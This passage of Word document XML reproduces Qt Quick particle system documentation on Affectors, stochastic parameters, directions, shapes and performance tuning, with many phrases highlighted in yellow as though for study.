          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1448" w:name="_Toc483000842"/>
      <w:bookmarkStart w:id="1449" w:name="_Toc483003835"/>
      <w:bookmarkStart w:id="1450" w:name="_Toc483604188"/>
      <w:bookmarkStart w:id="1451" w:name="_Toc483605408"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Affectors</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1448"/>
      <w:bookmarkEnd w:id="1449"/>
      <w:bookmarkEnd w:id="1450"/>
      <w:bookmarkEnd w:id="1451"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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Affectors are an </w:t>
      </w:r>
      <w:r w:rsidRPr="00791A59">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optional component</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a particle system. They </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can perform a variety of manipulations to the simulation</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>altering the trajectory</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of particles or </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prematurely ending their life</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the simulation. For performance reasons, it is </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>recommended not to use Affectors in high-volume particle systems</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1452" w:name="_Toc483000843"/>
      <w:bookmarkStart w:id="1453" w:name="_Toc483003836"/>
      <w:bookmarkStart w:id="1454" w:name="_Toc483604189"/>
      <w:bookmarkStart w:id="1455" w:name="_Toc483605409"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stochastic Parameters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1452"/>
      <w:bookmarkEnd w:id="1453"/>
      <w:bookmarkEnd w:id="1454"/>
      <w:bookmarkEnd w:id="1455"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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As particle systems </w:t>
      </w:r>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>benefit from stochastic control</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of parameters across a large number of instances, several </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stochastic helper types</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used by the particle system. If you do not wish to have any stochastic variation in these parameters, then do not specify any variation in these types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="002E1325" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1456" w:name="_Toc483000844"/>
      <w:bookmarkStart w:id="1457" w:name="_Toc483003837"/>
      <w:bookmarkStart w:id="1458" w:name="_Toc483604190"/>
      <w:bookmarkStart w:id="1459" w:name="_Toc483605410"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Directions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1456"/>
      <w:bookmarkEnd w:id="1457"/>
      <w:bookmarkEnd w:id="1458"/>
      <w:bookmarkEnd w:id="1459"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="36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Directions can be specified by </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>angle and magnitude</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by x and y</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> components. While any direction can be specified with either method, there is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>significant difference</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> between varying the x and y components and varying the angle and magnitude. Varying the x and y components will lead to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rectangular area around the specified point</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, while varying the </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>angle will lead to an arc centered</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the specified point.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1460" w:name="_Toc483000845"/>
      <w:bookmarkStart w:id="1461" w:name="_Toc483003838"/>
      <w:bookmarkStart w:id="1462" w:name="_Toc483604191"/>
      <w:bookmarkStart w:id="1463" w:name="_Toc483605411"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shapes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1460"/>
      <w:bookmarkEnd w:id="1461"/>
      <w:bookmarkEnd w:id="1462"/>
      <w:bookmarkEnd w:id="1463"/>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRPr="000437DC" w:rsidRDefault="000437DC" w:rsidP="000437DC">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The particle system contains several types which </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>represent shapes</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. These types do not visualize shapes, and are u</w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sed for the purpose of selecting a random point</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> within the shape. </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you want a specific point with no randomness</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, use a 0 width and 0 height shape (which is the default). </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Otherwise</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can </w:t>
      </w:r>
      <w:r w:rsidRPr="00136ED2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use the shape types</w:t>
      </w:r>
      <w:r w:rsidRPr="000437DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify an area, so that the result can use a random point selected from that area.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000437DC" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1842" w:history="1">
        <w:r w:rsidR="00E27D73" w:rsidRPr="005A37A4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-particles-performance.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="002E1325" w:rsidRDefault="00E27D73" w:rsidP="00E85C50">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1464" w:name="_Toc483000846"/>
      <w:bookmarkStart w:id="1465" w:name="_Toc483003839"/>
      <w:bookmarkStart w:id="1466" w:name="_Toc483604192"/>
      <w:bookmarkStart w:id="1467" w:name="_Toc483605412"/>
      <w:r w:rsidRPr="00E85C50">
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Particle System Performance Guide</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1464"/>
      <w:bookmarkEnd w:id="1465"/>
      <w:bookmarkEnd w:id="1466"/>
      <w:bookmarkEnd w:id="1467"/>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the particle system </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>scales with the number of particles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it is maintaining. After </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>prototyping the desired effect</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>performance can be improved by lowering the particle count</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Conversely, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if performance is well within the acceptable bounds</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, you </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can increase the number of particles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> until you hit that point (should that improve the effect).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>particle count is often estimated by the particle system</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and in some cases explicitly </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>providing hints</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as to how many particles will be needed will improve performance. You can do this by setting </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>maximumEmitted</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Emitter</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and it is gen</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>erally useful for Emitters which do not continuously emit particles</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27D73" w:rsidRPr="00E27D73" w:rsidRDefault="00E27D73" w:rsidP="00E27D73">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Like</w:t>
      </w:r>
      <w:r w:rsidRPr="00E27D73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1843" w:history="1">
        <w:r w:rsidRPr="00E27D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
